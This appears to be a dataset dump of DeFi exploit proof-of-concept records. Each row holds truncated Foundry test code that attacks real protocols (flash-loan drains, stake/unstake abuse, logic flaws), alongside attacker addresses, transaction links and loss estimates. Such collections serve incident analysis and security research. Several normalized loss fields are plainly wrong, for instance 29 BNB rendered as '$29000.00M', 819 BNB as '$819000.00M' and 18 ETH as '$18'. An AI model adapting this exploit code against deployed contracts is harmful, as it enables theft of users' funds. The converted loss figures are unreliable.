// Vuln Contract : https://etherscan.io/address/0xd3f64baa732061f8b3626ee44bab... | exploit_poc | UnizenIO2 | 2024-03 | UnizenIO2_exp.sol | null | cfc5d8fcd9dcd341 | 2026-01-07T10:59:16.524052 | postmortems | ethereum | 19,393,360 | ~$2M | 2,000,000 | https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df | null | null | null | null | null | true | true | false | critical | ~$2M | unknown | function testExploit() public {
emit log_named_decimal_uint("Exploiter VRA balance before attack", VRA.balanceOf(address(this)), VRA.decimals());
ITradeAggregator.Info memory info = ITradeAggregator.Info({
to: address(this),
structMember2: 0,
token: address(VRA),
... | true | ~$2M | https://etherscan.io/address/0x2ad8aed847e8d4d3da52aabb7d0f5c25729d10df | $2.00M | 5.63 | medium | UnizenIO2 Exploit (2024-03) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/bsc/0xb33057f57ce451aa8cbb65508d298fe3c627509cc64a394736dace2671b6dcfa
// Profit : ~13K USD
// REASON : Business Logic Flaw
// Transfer from pool,wil... | exploit_poc | IT | 2024-03 | IT_exp.sol | null | 325940c1e57bcf77 | 2026-01-07T10:59:16.524108 | postmortems | unknown | 36,934,258 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 2.72 | low | IT Exploit (2024-03) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$29BNB
// Attacker : https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946
// Attack Contract : https://bscscan.com/address/0x20dcf125f0563417d257b98a1... | exploit_poc | EAC | 2023-08 | EAC_exp.sol | flash_loan | b3f177ea72d9c0ab | 2026-01-07T10:59:16.524161 | postmortems | bsc | 31,273,019 | ~$29BNB | 29,000,000,000 | https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946 | https://bscscan.com/address/0x20dcf125f0563417d257b98a116c3fea4f0b2db2 | null | https://bscscan.com/tx/0x477f9ee698ac8ae800ffa012ab52fd8de39b58996245c5e39a4233c1ae5f1baa | null | https://twitter.com/bbbb/status/1696520866564350157 | true | true | true | critical | ~$29BNB | flash-loan | function testExploit() public {
IDPPOracle(dodo_pool).flashLoan(0, 300_000_000_000_000_008_388_608, address(this), new bytes(1));
} | true | ~$29BNB | https://bscscan.com/address/0x27e981348c2d1f5b2227c182a9d0ed46eed84946 | https://bscscan.com/address/0x20dcf125f0563417d257b98a116c3fea4f0b2db2 | https://bscscan.com/tx/0x477f9ee698ac8ae800ffa012ab52fd8de39b58996245c5e39a4233c1ae5f1baa | https://twitter.com/bbbb/status/1696520866564350157 | $29000.00M | 7.19 | medium | EAC Exploit (2023-08) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~286K USD$
// Attacker : https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b
// Attack Contract : https://etherscan.io/address/0xfe141c32e36ba7601d12... | exploit_poc | EarningFram | 2023-08 | EarningFram_exp.sol | null | 27eb0163e3bcf81d | 2026-01-07T10:59:16.524210 | postmortems | ethereum | 17,875,885 | ~286K USD$ | 286,000 | https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b | https://etherscan.io/address/0xfe141c32e36ba7601d128f0c39dedbe0f6abb983 | https://etherscan.io/address/0x863e572b215fd67c855d973f870266cf827aea5e | https://etherscan.io/tx/0x6e6e556a5685980317cb2afdb628ed4a845b3cbd1c98bdaffd0561cb2c4790fa | null | https://twitter.com/Phalcon_xyz/status/1689182459269644288 | true | true | false | high | ~286K USD$ | unknown | false | ~286K USD$ | https://etherscan.io/address/0xee4b3dd20902fa3539706f25005fa51d3b7bdf1b | https://etherscan.io/address/0xfe141c32e36ba7601d128f0c39dedbe0f6abb983 | https://etherscan.io/address/0x863e572b215fd67c855d973f870266cf827aea5e | https://etherscan.io/tx/0x6e6e556a5685980317cb2afdb628ed4a845b3cbd1c98bdaffd0561cb2c4790fa | https://twitter.com/Phalcon_xyz/status/1689182459269644288 | $286.0K | 5.83 | medium | EarningFram Exploit (2023-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~18ETH
// Attacker : https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6
// Attack Contract : https://etherscan.io/address/0xb7fbf984a50cd7c66e6da344... | exploit_poc | BTC20 | 2023-08 | BTC20_exp.sol | flash_loan | 84d8d9448a332a89 | 2026-01-07T10:59:16.524258 | postmortems | ethereum | 17,949,215 | ~18ETH | 18 | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0xb7fbf984a50cd7c66e6da3448d68d9f3b7f24f33 | null | https://etherscan.io/tx/0xcdd93e37ba2991ce02d8ca07bf6563bf5cd5ae801cbbce3dd0babb22e30b2dbe | null | https://twitter.com/DecurityHQ/status/1692924369662513472 | true | true | true | low | ~18ETH | flash-loan | false | ~18ETH | https://etherscan.io/address/0x6ce9fa08f139f5e48bc607845e57efe9aa34c9f6 | https://etherscan.io/address/0xb7fbf984a50cd7c66e6da3448d68d9f3b7f24f33 | https://etherscan.io/tx/0xcdd93e37ba2991ce02d8ca07bf6563bf5cd5ae801cbbce3dd0babb22e30b2dbe | https://twitter.com/DecurityHQ/status/1692924369662513472 | $18 | 7 | medium | BTC20 Exploit (2023-08) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$7M USD$
// Attacker : https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9
// Attack Contract : https://optimistic.etherscan.io/address/0... | exploit_poc | Exactly | 2023-08 | Exactly_exp.sol | null | ecdeb2de43e19205 | 2026-01-07T10:59:16.524362 | postmortems | ethereum | 108,375,557 | ~$7M USD$ | 7,000,000 | https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9 | https://optimistic.etherscan.io/address/0x6dd61c69415c8ecab3fefd80d079435ead1a5b4d | https://optimistic.etherscan.io/address/0x16748cb753a68329ca2117a7647aa590317ebf41 | https://optimistic.etherscan.io/tx/0x3d6367de5c191204b44b8a5cf975f257472087a9aadc59b5d744ffdef33a520e | https://medium.com/@exactly_protocol/exactly-protocol-incident-post-mortem-b4293d97e3ed | https://twitter.com/BlockSecTeam/status/1692533280971936059 | true | true | false | critical | ~$7M USD$ | unknown | false | ~$7M USD$ | https://optimistic.etherscan.io/address/0x3747dbbcb5c07786a4c59883e473a2e38f571af9 | https://optimistic.etherscan.io/address/0x6dd61c69415c8ecab3fefd80d079435ead1a5b4d | https://optimistic.etherscan.io/address/0x16748cb753a68329ca2117a7647aa590317ebf41 | https://optimistic.etherscan.io/tx/0x3d6367de5c191204b44b8a5cf975f257472087a9aadc59b5d744ffdef33a520e | https://medium.com/@exactly_protocol/exactly-protocol-incident-post-mortem-b4293d97e3ed | https://twitter.com/BlockSecTeam/status/1692533280971936059 | $7.00M | 7 | medium | Exactly Exploit (2023-08) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~630K USD$
// Attacker : https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3
// Attack Contract : https://basescan.org/address/0xea8f89f47f3d4293897b... | exploit_poc | Leetswap | 2023-08 | Leetswap_exp.sol | null | adb04efd7d54852f | 2026-01-07T10:59:16.524474 | postmortems | base | 2,031,746 | ~630K USD$ | 630,000 | https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3 | https://basescan.org/address/0xea8f89f47f3d4293897b4fe8cb69b5c233b9f560 | https://basescan.org/address/0x94dac4a3ce998143aa119c05460731da80ad90cf | https://basescan.org/tx/0xbb837d417b76dd237b4418e1695a50941a69259a1c4dee561ea57d982b9f10ec | null | https://twitter.com/BlockSecTeam/status/1686217464051539968 | true | true | false | high | ~630K USD$ | unknown | false | ~630K USD$ | https://basescan.org/address/0x705f736145bb9d4a4a186f4595907b60815085c3 | https://basescan.org/address/0xea8f89f47f3d4293897b4fe8cb69b5c233b9f560 | https://basescan.org/address/0x94dac4a3ce998143aa119c05460731da80ad90cf | https://basescan.org/tx/0xbb837d417b76dd237b4418e1695a50941a69259a1c4dee561ea57d982b9f10ec | https://twitter.com/BlockSecTeam/status/1686217464051539968 | $630.0K | 5.3 | medium | Leetswap Exploit (2023-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/console.sol";
import "forge-std/Test.sol";
import "../test/../interface.sol";
// @KeyInfo - Total Lost : ~2M
// Attacker : https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b
// Attack Contract : https://etherscan.io... | exploit_poc | Balancer | 2023-08 | Balancer_exp.sol | flash_loan | a7fbe74733396115 | 2026-01-07T10:59:16.524521 | postmortems | ethereum | 18,004,651 | ~2M | 2,000,000 | https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b | https://etherscan.io/address/0x2100dcd8758ab8b89b9b545a43a1e47e8e2944f0 | https://etherscan.io/address/0x9210f1204b5a24742eba12f710636d76240df3d0 | https://etherscan.io/tx/0x2a027c8b915c3737942f512fc5d26fd15752d0332353b3059de771a35a606c2d | https://blocksecteam.medium.com/yet-another-risk-posed-by-precision-loss-an-in-depth-analysis-of-the-recent-balancer-incident-fad93a3c75d4 | https://twitter.com/wavey0x/status/1702311454689357851 | true | true | true | critical | ~2M | flash-loan | function testExploit() public {
address[] memory assets = new address[](1);
assets[0] = address(USDC);
uint256[] memory amounts = new uint256[](1);
amounts[0] = 300_000 * 1e6;
uint256[] memory interestRateModes = new uint256[](2);
interestRateModes[0] = 0;
interes... | true | ~2M | https://etherscan.io/address/0xed187f37e5ad87d5b3b2624c01de56c5862b7a9b | https://etherscan.io/address/0x2100dcd8758ab8b89b9b545a43a1e47e8e2944f0 | https://etherscan.io/address/0x9210f1204b5a24742eba12f710636d76240df3d0 | https://etherscan.io/tx/0x2a027c8b915c3737942f512fc5d26fd15752d0332353b3059de771a35a606c2d | https://blocksecteam.medium.com/yet-another-risk-posed-by-precision-loss-an-in-depth-analysis-of-the-recent-balancer-incident-fad93a3c75d4 | https://twitter.com/wavey0x/status/1702311454689357851 | $2.00M | 10 | high | Balancer Exploit (2023-08) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/Phalcon_xyz/status/1695285435671392504?s=20
// @TX
// https://bscscan.com/tx/0xf2a0c957fef493af44f55b201fbc6d82db2e4a045c5c856bfe3d8cb80fa30c12
interface ISVTp... | exploit_poc | SVT | 2023-08 | SVT_exp.sol | flash_loan | d7374028e8775465 | 2026-01-07T10:59:16.524586 | postmortems | bsc | 31,178,238 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
BUSD.approve(address(pool), type(uint256).max);
SVT.approve(address(pool), type(uint256).max);
uint256 flash_amount = BUSD.balanceOf(dodo);
DVM(dodo).flashLoan(0, flash_amount, address(this), new bytes(1));
emit log_named_decimal_uint("[End] Attac... | true | Unknown | 3.99 | low | SVT Exploit (2023-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$24883 USD$
// Attacker : https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d
// Attack Contract : https://bscscan.com/address/0x69ed5b59d977695650ec... | exploit_poc | GSS | 2023-08 | GSS_exp.sol | flash_loan | 449cb644d3e0128a | 2026-01-07T10:59:16.524624 | postmortems | bsc | 31,108,559 | ~$24883 USD$ | 24,883 | https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d | https://bscscan.com/address/0x69ed5b59d977695650ec4b29e61c0faa8cc0ed5c | null | https://bscscan.com/tx/0x4f8cb9efb3cc9930bd38af5f5d34d15ce683111599a80df7ae50b003e746e336 | null | https://twitter.com/bbbb/status/1694571228185723099 | true | true | true | medium | ~$24883 USD$ | flash-loan | function testExploit() public {
IDPPOracle(dodo_pool).flashLoan(0, 30_000 ether, address(this), new bytes(1));
} | true | ~$24883 USD$ | https://bscscan.com/address/0x84f37f6cc75ccde5fe9ba99093824a11cfdc329d | https://bscscan.com/address/0x69ed5b59d977695650ec4b29e61c0faa8cc0ed5c | https://bscscan.com/tx/0x4f8cb9efb3cc9930bd38af5f5d34d15ce683111599a80df7ae50b003e746e336 | https://twitter.com/bbbb/status/1694571228185723099 | $24.9K | 7.34 | medium | GSS Exploit (2023-08) | true | false | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$15K
// Attacker : https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5
// Attacker Contract : https://etherscan.io/address/0x98c2e1e85f8bf737d9c1450... | exploit_poc | EHIVE | 2023-08 | EHIVE_exp.sol | flash_loan | 44a56c40cf2726f3 | 2026-01-07T10:59:16.524669 | postmortems | ethereum | 17,690,497 | ~$15K | 15,000 | https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5 | null | https://etherscan.io/address/0x4ae2cd1f5b8806a973953b76f9ce6d5fab9cdcfd | https://etherscan.io/tx/0xad818ec910def08c70ac519ab0fffa084b4178014a91cd8aa2f882d972a511c1 | null | null | true | true | true | medium | ~$15K | flash-loan | function testExploit() public {
// 1. Deploy exploit contract
// 2. Call EHIVE stake function with amount 0
for (uint256 i; i < contractList.length; ++i) {
address deployedContract = address(new UnstakeContract());
IUnstake(deployedContract).stake(0);
contract... | true | ~$15K | https://etherscan.io/address/0x0195448a9c4adeaf27002c6051c949f3c3234bb5 | https://etherscan.io/address/0x4ae2cd1f5b8806a973953b76f9ce6d5fab9cdcfd | https://etherscan.io/tx/0xad818ec910def08c70ac519ab0fffa084b4178014a91cd8aa2f882d972a511c1 | $15.0K | 9.79 | high | EHIVE Exploit (2023-08) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2M USD$
// Attacker : https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df
// Attack Contract : https://etherscan.io/address/0xa21a2b59d80dc42d332f77... | exploit_poc | Zunami | 2023-08 | Zunami_exp.sol | flash_loan | 0304427608057b20 | 2026-01-07T10:59:16.524727 | postmortems | ethereum | 17,908,949 | ~2M USD$ | 2,000,000 | https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df | https://etherscan.io/address/0xa21a2b59d80dc42d332f778cbb9ea127100e5d75 | https://etherscan.io/address/0xb40b6608b2743e691c9b54ddbdee7bf03cd79f1c | https://etherscan.io/tx/0x0788ba222970c7c68a738b0e08fb197e669e61f9b226ceec4cab9b85abe8cceb | null | https://twitter.com/peckshield/status/1690877589005778945 | true | true | true | critical | ~2M USD$ | flash-loan | false | ~2M USD$ | https://etherscan.io/address/0x5f4c21c9bb73c8b4a296cc256c0cde324db146df | https://etherscan.io/address/0xa21a2b59d80dc42d332f778cbb9ea127100e5d75 | https://etherscan.io/address/0xb40b6608b2743e691c9b54ddbdee7bf03cd79f1c | https://etherscan.io/tx/0x0788ba222970c7c68a738b0e08fb197e669e61f9b226ceec4cab9b85abe8cceb | https://twitter.com/peckshield/status/1690877589005778945 | $2.00M | 8 | high | Zunami Exploit (2023-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~176 ETH
// Attacker : https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4
// Attack Contract : https://etherscan.io/address/0xda2ccfc4557ba55eada3cb... | exploit_poc | Uwerx | 2023-08 | Uwerx_exp.sol | null | b8b5543e70a0e113 | 2026-01-07T10:59:16.524798 | postmortems | ethereum | 17,826,202 | ~176 ETH | 176 | https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4 | https://etherscan.io/address/0xda2ccfc4557ba55eada3cbebd0aeffcf97fc14ca | https://etherscan.io/token/0x4306b12f8e824ce1fa9604bbd88f2ad4f0fe3c54 | https://etherscan.io/tx/0x3b19e152943f31fe0830b67315ddc89be9a066dc89174256e17bc8c2d35b5af8 | null | https://twitter.com/deeberiroz/status/1686683788795846657 | true | true | false | low | ~176 ETH | unknown | false | ~176 ETH | https://etherscan.io/address/0x6057a831d43c395198a10cf2d7d6d6a063b1fce4 | https://etherscan.io/address/0xda2ccfc4557ba55eada3cbebd0aeffcf97fc14ca | https://etherscan.io/token/0x4306b12f8e824ce1fa9604bbd88f2ad4f0fe3c54 | https://etherscan.io/tx/0x3b19e152943f31fe0830b67315ddc89be9a066dc89174256e17bc8c2d35b5af8 | https://twitter.com/deeberiroz/status/1686683788795846657 | $176 | 5.35 | medium | Uwerx Exploit (2023-08) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.19;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/phalcon_xyz/status/1686654241111429120?s=46&t=Oc_WAGUoXqc9c0LidD-zww
// @TX
// https://explorer.phalcon.xyz/tx/arbitrum/0x6301d4c9f7ac1c96a65e83be6ea2fff5000f0b... | exploit_poc | NeutraFinance | 2023-08 | NeutraFinance_exp.sol | flash_loan | bcc9cc49052e4dff | 2026-01-07T10:59:16.524848 | postmortems | unknown | 117,189,138 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function test() public {
console.log("Attacker's WETH token balance: ", WETH.balanceOf(address(this)));
IERC20[] memory tokens = new IERC20[](1);
uint256[] memory amount = new uint256[](1);
tokens[0] = WETH;
amount[0] = 1000 ether;
bytes memory userdata;
valut.fla... | true | Unknown | 6 | medium | NeutraFinance Exploit (2023-08) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$36k USD$
// Attacker : https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c
// Attack Contract : https://etherscan.io/address/0x915dff6707bea63daea1... | exploit_poc | CurveBurner | 2023-08 | CurveBurner_exp.sol | flash_loan | ee2297a0c0d9287e | 2026-01-07T10:59:16.524935 | postmortems | ethereum | 17,823,542 | ~$36k USD$ | 36,000 | https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c | https://etherscan.io/address/0x915dff6707bea63daea1b41aa5d37353229066ba | https://etherscan.io/address/0x786b374b5eef874279f4b7b4de16940e57301a58 | https://etherscan.io/tx/0xd493c73397952049644c531309df3dd4134bf3db1e64eb6f0b68b016ee0bffde | https://medium.com/@Hypernative/exotic-culinary-hypernative-systems-caught-a-unique-sandwich-attack-against-curve-finance-6d58c32e436b | null | true | true | true | medium | ~$36k USD$ | flash-loan | false | ~$36k USD$ | https://etherscan.io/address/0xccc526e2433db1eebb9cbf6acd7f03a19408278c | https://etherscan.io/address/0x915dff6707bea63daea1b41aa5d37353229066ba | https://etherscan.io/address/0x786b374b5eef874279f4b7b4de16940e57301a58 | https://etherscan.io/tx/0xd493c73397952049644c531309df3dd4134bf3db1e64eb6f0b68b016ee0bffde | https://medium.com/@Hypernative/exotic-culinary-hypernative-systems-caught-a-unique-sandwich-attack-against-curve-finance-6d58c32e436b | $36.0K | 8 | high | CurveBurner Exploit (2023-08) | true | true | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1613267000913960976
// @TX
// https://etherscan.io/tx/0x927b784148b60d5233e57287671cdf67d38e3e69e5b6d0ecacc7c1aeaa98985b
interface ROE {
... | exploit_poc | RoeFinance | 2023-01 | RoeFinance_exp.sol | flash_loan | 3977b2918bfbc45e | 2026-01-07T10:59:16.524995 | postmortems | ethereum | 16,384,469 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | false | Unknown | 2.96 | low | RoeFinance Exploit (2023-01) | false | false | false | false | ||||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;
import "forge-std/console2.sol";
import "forge-std/Test.sol";
import "./../interface.sol";
// Total Lost: ~22 ETH
// Attacker: 0xceed34f03a3e607cc04c2d0441c7386b190d7cf4
// Attack Contract: 0x762d2a9f065304d42289f3f13cc8ea23226d3b8c
// Vulnerable Contract... | exploit_poc | Upswing | 2023-01 | Upswing_exp.sol | null | 7090fd9c69573560 | 2026-01-07T10:59:16.525044 | postmortems | ethereum | 16,433,820 | ~22 ETH | 22 | null | null | null | https://etherscan.io/tx/0x4b3df6e9c68ae482c71a02832f7f599ff58ff877ec05fed0abd95b31d2d7d912 | null | null | false | true | false | low | ~22 ETH | unknown | function testExploit() public {
// sample attack with 1 ether
deal(weth, address(this), 1 ether);
address[] memory path = new address[](2);
path[0] = weth;
path[1] = upsToken;
IERC20(weth).approve(address(uniRouter), type(uint256).max);
uniRouter.swapExactTokens... | true | https://etherscan.io/tx/0x4b3df6e9c68ae482c71a02832f7f599ff58ff877ec05fed0abd95b31d2d7d912 | $22 | 6.39 | medium | Upswing Exploit (2023-01) | true | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 819 BNB (~224K US$)
// Attacker : 0x67a909f2953fb1138bea4b60894b51291d2d0795
// Vulnerable Contract : 0x449fea37d339a11efe1b181e5d5462464bba3752
// @Info
// Attack Cont... | exploit_poc | BRA | 2023-01 | BRA_exp.sol | flash_loan | 4755dc6cd637724a | 2026-01-07T10:59:16.525093 | postmortems | bsc | 24,655,771 | 819 BNB (~224K US$) | 819,000,000,000 | null | null | null | null | null | null | true | true | true | critical | 819 BNB (~224K US$) | flash-loan | function testExploit() public {
emit log_named_decimal_uint("[Before Attacks] Attacker WBNB balance", wbnb.balanceOf(address(this)), 18);
exploit.go();
emit log_named_decimal_uint("[After Attacks] Attacker WBNB balance", wbnb.balanceOf(address(this)), 18);
}
}
contract Exploit is Test {
... | true | 819 BNB (~224K US$) | $819000.00M | 8 | high | BRA Exploit (2023-01) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1615232012834705408
// @TX
// invest
// https://bscscan.com/tx/0x49bed801b9a9432728b1939951acaa8f2e874453d39c7d881a62c2c157aa7613
// withdra... | exploit_poc | OmniEstate | 2023-01 | OmniEstate_exp.sol | null | 36158a2c89eaf969 | 2026-01-07T10:59:16.525166 | postmortems | bsc | 24,850,696 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
// 1. get some ort token
IWBNB(WBNB).deposit{value: 1e18}();
emit log_named_decimal_uint("[Before Attacks] Attacker WBNB balance", WBNB.balanceOf(address(this)), 18);
bscSwap(address(WBNB), ORT, 1e18);
// 2. invest
IERC20(ORT).approve(Omni,... | true | Unknown | 3.14 | low | OmniEstate Exploit (2023-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/peckshield/status/1610095490368180224
// https://twitter.com/BlockSecTeam/status/1610167174978760704
// @TX
// https://bscscan.com/tx/0xf9b6cc083f6e0e41ce5e5dd6... | exploit_poc | GDS | 2023-01 | GDS_exp.sol | flash_loan | 9482e4fae1ad362c | 2026-01-07T10:59:16.525208 | postmortems | bsc | 24,449,918 | null | null | null | null | null | null | null | null | false | true | true | medium | null | flash-loan | function testExploit() public {
address(WBNB).call{value: 50 ether}("");
WBNBToUSDT();
USDTToGDS(10 * 1e18);
GDSUSDTAddLiquidity(10 * 1e18, GDS.balanceOf(address(this)));
USDTToGDS(USDT.balanceOf(address(this)));
PerContractGDSAmount = GDS.balanceOf(address(this)) / 100;
... | true | Unknown | 6 | medium | GDS Exploit (2023-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
// Total lost: 22 ETH
// Attacker: 0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195
// Attack Contract: 0xdb2d869ac23715af204093e933f5eb57f2dc12a9
// Vulnerable Contract: 0x2d0e64b6bf13660a4c0de42a0b88144a7c10991f
// Attack Tx: htt... | exploit_poc | TINU | 2023-01 | TINU_exp.sol | flash_loan | d5594f9270de2b2f | 2026-01-07T10:59:16.525265 | postmortems | ethereum | 16,489,408 | 22 ETH | 22 | null | null | null | https://phalcon.blocksec.com/tx/eth/0x6200bf5c43c214caa1177c3676293442059b4f39eb5dbae6cfd4e6ad16305668 | null | null | false | true | true | low | 22 ETH | flash-loan | false | https://phalcon.blocksec.com/tx/eth/0x6200bf5c43c214caa1177c3676293442059b4f39eb5dbae6cfd4e6ad16305668 | $22 | 6.57 | medium | TINU Exploit (2023-01) | true | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~4 ETH
// Original Attacker: https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195
// Frontrunner: https://etherscan.io/address/0xe71aca93c0e0721f8250d... | exploit_poc | SHOCO | 2023-01 | SHOCO_exp.sol | null | b14adc24c4d28773 | 2026-01-07T10:59:16.525325 | postmortems | ethereum | null | ~4 ETH | 4 | https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195 | https://etherscan.io/address/0x15d684b4ecdc0ece8bc9aec6bce3398a9a4c7611 | https://etherscan.io/address/0x31a4f372aa891b46ba44dc64be1d8947c889e9c6 | https://etherscan.io/tx/0x2e832f044b4a0a0b8d38166fe4d781ab330b05b9efa9e72a7a0895f1b984084b | null | null | true | true | false | low | ~4 ETH | unknown | false | ~4 ETH | https://etherscan.io/address/0x14d8ada7a0ba91f59dc0cb97c8f44f1d177c2195 | https://etherscan.io/address/0x15d684b4ecdc0ece8bc9aec6bce3398a9a4c7611 | https://etherscan.io/address/0x31a4f372aa891b46ba44dc64be1d8947c889e9c6 | https://etherscan.io/tx/0x2e832f044b4a0a0b8d38166fe4d781ab330b05b9efa9e72a7a0895f1b984084b | $4 | 6.28 | medium | SHOCO Exploit (2023-01) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1615625901739511809
// @TX
// https://etherscan.io/tx/0x37cb8626e45f0749296ef080acb218e5ccc7efb2ae4d39c952566dc378ca1c4c
// https://ethersca... | exploit_poc | QTN | 2023-01 | QTN_exp.sol | null | 71e5acaebc0939b7 | 2026-01-07T10:59:16.525379 | postmortems | ethereum | 16,430,212 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public {
address(WETH).call{value: 2 ether}("");
WETHToQTN();
cheats.warp(block.timestamp + 500); // _timeLimitFromLastBuy 5 minutes
QTNContractFactory();
cheats.warp(block.timestamp + 500);
QTNContractBack();
QTNToWETH();
emit log_... | true | Unknown | 3.55 | low | QTN Exploit (2023-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// Total lost: 144 BNB
// Frontrunner: https://bscscan.com/address/0xd3455773c44bf0809e2aeff140e029c632985c50
// Original Attacker: https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f02... | exploit_poc | BEVO | 2023-01 | BEVO_exp.sol | flash_loan | 776d6a4d630b8e5e | 2026-01-07T10:59:16.525420 | postmortems | bsc | 25,230,702 | 144 BNB | 144,000,000,000 | https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f0261f9fd | https://bscscan.com/address/0xbf7fc9e12bcd08ec7ef48377f2d20939e3b4845d | https://bscscan.com/address/0xc6cb12df4520b7bf83f64c79c585b8462e18b6aa | https://bscscan.com/tx/0xb97502d3976322714c828a890857e776f25c79f187a32e2d548dda1c315d2a7d | null | null | false | true | true | critical | 144 BNB | flash-loan | false | https://bscscan.com/address/0x68fa774685154d3d22dec195bc77d53f0261f9fd | https://bscscan.com/address/0xbf7fc9e12bcd08ec7ef48377f2d20939e3b4845d | https://bscscan.com/address/0xc6cb12df4520b7bf83f64c79c585b8462e18b6aa | https://bscscan.com/tx/0xb97502d3976322714c828a890857e776f25c79f187a32e2d548dda1c315d2a7d | $144000.00M | 6.66 | medium | BEVO Exploit (2023-01) | true | true | true | false | ||||
